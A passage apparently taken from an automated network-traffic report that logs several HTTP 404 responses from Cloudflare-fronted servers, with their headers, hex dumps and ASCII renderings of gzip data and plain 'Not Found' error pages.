                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:13:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O1XnqwfEEirlkA2EPdwbn6CLaBEeClscuuC3A61bgL6a2hcO%2FlEVjURrOAEcADVcx2q7yiD2gH8Z9ZCsq2U3%2BJlOroEimpUQNWFTbQTnkKXtJ0WUOaInn%2BJyNzFxqgp9GnsXCkVWYm3g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 93063513cc341308-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=127386&min_rtt=127386&rtt_var=63693&sent=4&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=7013&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:13:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TfvrJ3BQGSNzGgsgtk%2BHAhzbhSpXrFtzK2B5nEhPJzzXNmFJi4ZcijjaoXggA%2B9DRkkBEkCL3k7x8AdIExfWfqwFcBDVh6pjDsHH1TrBBdw5Br8Q94fbmNNGFC7yGColITs2el%2BC9eYI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930635247afd0a1a-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=126115&min_rtt=126115&rtt_var=63057&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=464&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 
72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frien
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8KCHCJUAEDY7V5lRNoaCU7UWYTPO9YDuAFw%2Bl6J6OO9BkoZomlRdqRVh%2BlM%2FILal3%2BUMfkHn7OFasbs3LLlc8lAF83P4Lw4FESRNHwvmi0U6n6slzD90jzrzumJ4fM85LQW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 93063628ae105c81-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121257&min_rtt=121257&rtt_var=60628&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 37 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 55 6d 6f db 36 10 fe 9e 5f c1 ba 18 d0 14 a4 22 c9 6f 81 9c 04 e8 b2 16 2d d0 64 c3 d2 7d 18 86 7d a0 a4 93 c4 86 22 05 8a b6 e5 aa fa ef 03 49 49 96 93 ae ad 0d c3 bc e7 4e cf 43 1e ef 4e 57 2f 7e fb fd f6 d3 df 7f bc 45 85 2e f9 cd d9 95 f9 43 9c 8a fc 7a 06 62 76 73 86 10 42 57 05 d0 d4 2d ad 59 82 a6 28 29 a8 aa 41 5f cf b6 3a 23 97 b3 a7 6e 41 4b b8 9e ed 18 ec 2b a9 f4 0c 25 52 68 10 fa 7a b6 67 a9 2e ae 53 d8 b1 04 88 35 30 62 82 69 46 39 a9 13 ca e1 3a 98 dd 9c 1d d9 34 d3 1c 6e ee a5 46 ef e4 56 a4 57 17 0e 98 44 d4 fa 60 00 34 f9 5c bc 7e 81 84 54 25 e5 ec 0b 78 49 5d a3 dd a5 e7 7b 01 fa 8a ee 3e 7c 42 1f 59 02 a2 06 f4 15 e5 4c 17 db d8 4b 64 79 21 20 91 9c d6 17 a7 cf bd be 30 19 69 39 13 40 0a 60 79 a1 a3 c0 0b 96 1b b2 87 f8 91 69 a2 a1 d1 a4 66 5f 80 d0 f4 f3 b6 d6 51 e0 fb bf 74 b1 4c 0f 6d 49 55 ce 44 e4 77 b4 8d 69 f2 98 2b b3 7f 92 48 2e 55 a4 15 15 75 45 15 08 dd 25 32 85 36 93 42 93 8c 96 8c 1f a2 52 0a 59 57 34 01 3c ae 36 d6 6f 74 a2 00 ca ee 9f 82 a5 29 88 7f db 94 d5 15 a7 87 48 48 01 9d dd e9 
94 a8 3e d4 1a 4a b2 65 98 d0 aa e2 40 1c 80 7f e5 4c 3c de d1 e4 c1 9a ef a4 d0 f8 01 72 09 e8 af 0f f8 4f 19 4b 2d f1 7b e0 3b d0 2c a1 e8 1e b6 80 df 28 46 39 be 97 5a a2 07 2a 6a 5c 53 51 93 1a 14 cb f0 1b c3 8c 6e cd b1 d0 db 52 7e 66 23 d7 53 f3 e1 50 c6 b2 67 99 c4 6f 4e 93 bb ec 5e e3 88 66 1a 14 8e 62 c8 a4 82 36 96 8d 39 3b 13 79 14 4b 95 82 22 b1 6c 36 6e 19 f9 a8 96 Data Ascii: 470Umo6_"o-d}}"IINCNW/~E.CzbvsBW-Y()A_:#nAK+%Rhzg.S50biF9:4nFVWD`4\~T%xI]{>|BYLKdy! 0i9@`yif_QtLmIUDwi+H.UuE%26BRYW4<6ot)HH>Je@L<rOK-{;,(F9Z*j\SQnR~f#SPgoN^fb69;yK"l6n
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9STWzD2hSkYbFieE1xO9EckPHIuMgj69fvCsV%2Bi%2BYz2aLVOPXv6hC%2BOuVP471glqFMEghmQjp1cqcm1JtOepLoyOODQRZX%2BgAUeU2F93ObmSBdbupjndApdQA1gGFFNa7t9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930636394e01e1ca-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121445&min_rtt=121445&rtt_var=60722&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 38 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 59 5f 8f e3 b6 11 7f bf 4f c1 38 38 60 7d 20 b5 94 6c d9 3e 79 77 91 f4 9a a0 01 72 d7 a2 97 3e 04 4d 1f 68 69 64 33 2b 91 02 45 ff d9 53 f4 dd 0b 92 92 2c d9 5e ef 1e 90 be d5 8b 85 c5 99 e1 6f 46 43 72 38 33 be fb e6 af 7f ff f0 cb af ff f8 01 6d 74 9e 3d bc b9 33 5f 28 63 62 7d 3f 02 31 7a 78 83 10 42 77 1b 60 89 7b b4 c3 1c 34 43 f1 86 a9 12 f4 fd 68 ab 53 b2 18 9d b2 05 cb e1 7e b4 e3 b0 2f a4 d2 23 14 4b a1 41 e8 fb d1 9e 27 7a 73 9f c0 8e c7 40 ec 00 23 2e b8 e6 2c 23 65 cc 32 b8 f7 47 0f 6f 8e 68 9a eb 0c 1e 3e 49 8d 7e 94 5b 91 dc dd 3a 42 4f a2 d4 4f 86 80 7a 9f db 77 df 20 21 55 ce 32 fe 05 bc b8 2c d1 6e e1 51 cf 47 7f a0 8f 3f fd 82 7e e6 31 88 12 d0 1f 68 cd f5 66 bb f2 62 99 df 0a 88 65 c6 ca db e1 bc 77 b7 c6 23 55 c6 05 90 0d f0 f5 46 47 be e7 87 4b b2 87 d5 23 d7 44 c3 41 93 92 7f 01 c2 92 df b7 a5 8e 7c 4a df d6 2b 99 3c 55 39 53 6b 2e 22 5a b3 6a c5 e2 c7 b5 32 f6 93 58 66 52 45 5a 31 51 16 4c 81 d0 75 2c 13 a8 52 29 34 49 59 ce b3 a7 28 97 42 96 05 8b 01 77 4f 4b cb 37 7a 22 1f f2 fa df 1b 9e 24 20 
fe 53 25 bc 2c 32 f6 14 09 29 a0 b6 96 f6 81 ca a7 52 43 4e b6 1c 13 56 14 19 10 47 c0 7f c9 b8 78 fc c8 e2 cf 76 f8 a3 14 1a 7f 86 b5 04 f4 af 9f f0 3f e5 4a 6a 89 ff 06 d9 0e 34 8f 19 fa 04 5b c0 df 2b ce 32 fc 49 6a 89 3e 33 51 e2 92 89 92 94 a0 78 8a bf 37 c8 e8 83 79 2d f4 43 2e 7f e7 1d d6 e9 f0 f3 53 be 92 0d 4a 4f 7e 39 74 6e 58 bf c3 11 4b 35 28 1c ad 20 95 0a aa 95 3c Data Ascii: 82cY_O88`} l>ywr>Mhid3+ES,^oFCr83mt=3_(cb}?1zxBw`{4ChS~/#KA'zs@#.,#e2Goh>I~[:BOOzw !U2,nQG?~1hfbew#UFGK#DA|J+<U9Sk."Zj2XfREZ1QLu,R)4IY(BwOK7z"$ S%,2)RCNVGxv?Jj4[+2Ij>3Qx7y-C.SJO~9tnXK5( <
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M4L%2BuCM9dpt0sflHX9LJL1XWmi9z9wcXZNX51Rzram3Pgz2WQz0h%2F97qTcWUL5vY7UA0g9N3zJbVQQbBdYCmuTZQDL7cXBORmDgP%2F0XjoKQgEbQTUPCYrEvciOEg8EMySRLj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 93063649fda28dbe-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121229&min_rtt=121229&rtt_var=60614&sent=2&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=6995&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 38 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 59 5f 8f e3 b6 11 7f bf 4f c1 38 38 60 7d 20 b5 94 6c d9 3e 79 77 91 f4 9a a0 01 72 d7 a2 97 3e 04 4d 1f 68 69 64 33 2b 91 02 45 ff d9 53 f4 dd 0b 92 92 2c d9 5e ef 1e 90 be d5 8b 85 c5 99 e1 6f 46 43 72 38 33 be fb e6 af 7f ff f0 cb af ff f8 01 6d 74 9e 3d bc b9 33 5f 28 63 62 7d 3f 02 31 7a 78 83 10 42 77 1b 60 89 7b b4 c3 1c 34 43 f1 86 a9 12 f4 fd 68 ab 53 b2 18 9d b2 05 cb e1 7e b4 e3 b0 2f a4 d2 23 14 4b a1 41 e8 fb d1 9e 27 7a 73 9f c0 8e c7 40 ec 00 23 2e b8 e6 2c 23 65 cc 32 b8 f7 47 0f 6f 8e 68 9a eb 0c 1e 3e 49 8d 7e 94 5b 91 dc dd 3a 42 4f a2 d4 4f 86 80 7a 9f db 77 df 20 21 55 ce 32 fe 05 bc b8 2c d1 6e e1 51 cf 47 7f a0 8f 3f fd 82 7e e6 31 88 12 d0 1f 68 cd f5 66 bb f2 62 99 df 0a 88 65 c6 ca db e1 bc 77 b7 c6 23 55 c6 05 90 0d f0 f5 46 47 be e7 87 4b b2 87 d5 23 d7 44 c3 41 93 92 7f 01 c2 92 df b7 a5 8e 7c 4a df d6 2b 99 3c 55 39 53 6b 2e 22 5a b3 6a c5 e2 c7 b5 32 f6 93 58 66 52 45 5a 31 51 16 4c 81 d0 75 2c 13 a8 52 29 34 49 59 ce b3 a7 28 97 42 96 05 8b 01 77 4f 4b cb 37 7a 22 1f f2 fa df 1b 9e 24 20 
fe 53 25 bc 2c 32 f6 14 09 29 a0 b6 96 f6 81 ca a7 52 43 4e b6 1c 13 56 14 19 10 47 c0 7f c9 b8 78 fc c8 e2 cf 76 f8 a3 14 1a 7f 86 b5 04 f4 af 9f f0 3f e5 4a 6a 89 ff 06 d9 0e 34 8f 19 fa 04 5b c0 df 2b ce 32 fc 49 6a 89 3e 33 51 e2 92 89 92 94 a0 78 8a bf 37 c8 e8 83 79 2d f4 43 2e 7f e7 1d d6 e9 f0 f3 53 be 92 0d 4a 4f 7e 39 74 6e 58 bf c3 11 4b 35 28 1c ad 20 95 0a aa 95 3c 98 Data Ascii: 82cY_O88`} l>ywr>Mhid3+ES,^oFCr83mt=3_(cb}?1zxBw`{4ChS~/#KA'zs@#.,#e2Goh>I~[:BOOzw !U2,nQG?~1hfbew#UFGK#DA|J+<U9Sk."Zj2XfREZ1QLu,R)4IY(BwOK7z"$ S%,2)RCNVGxv?Jj4[+2Ij>3Qx7y-C.SJO~9tnXK5( <
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X4FUvXQg1TfrNz26u%2B%2B12jv3%2FVPNbL66CkfpKdC3pAhsPpTHNJiAA0PU%2B8a1fgpFnFDv7qpO8DXXQpOVh%2BLme3vbs4oKDiFS2onb0c7hioGAJpAfOjfliTu2sohSslkjUG8A"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9306365a9d39347f-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121330&min_rtt=121330&rtt_var=60665&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=458&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 7b 62 61 
63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 79 73 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c Data Ascii: 19cb<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> <style> /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,Bl
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKPckmjmhq7kq7Uix2tBnUdFBzhLNAuVBkOZHCK2bV0NVfygcS0iff1kFcf9Fi%2BBNifgiuIb6NeogzV3DVBGYjJT0Q%2FOTMUrAaKnRHSfTOxlCTEZxZN9qFUuQAfa1fxVvf5VrTce"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930636d5bf5731ce-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=126097&min_rtt=126097&rtt_var=63048&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2FPyrM6AKxi1Yc%2BhhG7L7g%2B6QfuOUwirloKi5FFAkupMkf9GbrOTt5kTV%2FSz%2BewIF3bIQf%2Boc86s7GliiAv2pDV85I8Xnl2YbHQkCtON9U7SmDI%2BXy0%2BLqJ3En3Ru9VnFIPU0pxt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930636e65f6f8cfd-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=124458&min_rtt=124458&rtt_var=62229&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xwqL0GZhUVeyP1v74wC9dVxqUZ5MQD51hqobIdI5%2Bd4%2FDR3w5X0Yh35sbvyyWkEapmlXs7j1xSgH7%2FaTOuuAjrU1OTPLDCXNWwg9O0WywE4Dtx0eYJNEhmAcPNe3BAXOZs5xSCFj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930636f71a378dc6-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=123436&min_rtt=123436&rtt_var=61718&sent=3&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=7004&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:14:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: max-age=43200CF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unm4Rlu%2FQXg%2B%2BeXFZCDOFOkoZcrLOwC6oB58Zcdr%2BNfWowgk4p7jMVuxWDDBNDoXiVLJEgQUqeEQgNYgrU02n9mh9rJWTNk16fhGw0S8wX1qO%2FeRWZn0fkklW1DvPYdMqvzxKiMc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 93063707bf085674-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121928&min_rtt=121928&rtt_var=60964&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=461&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 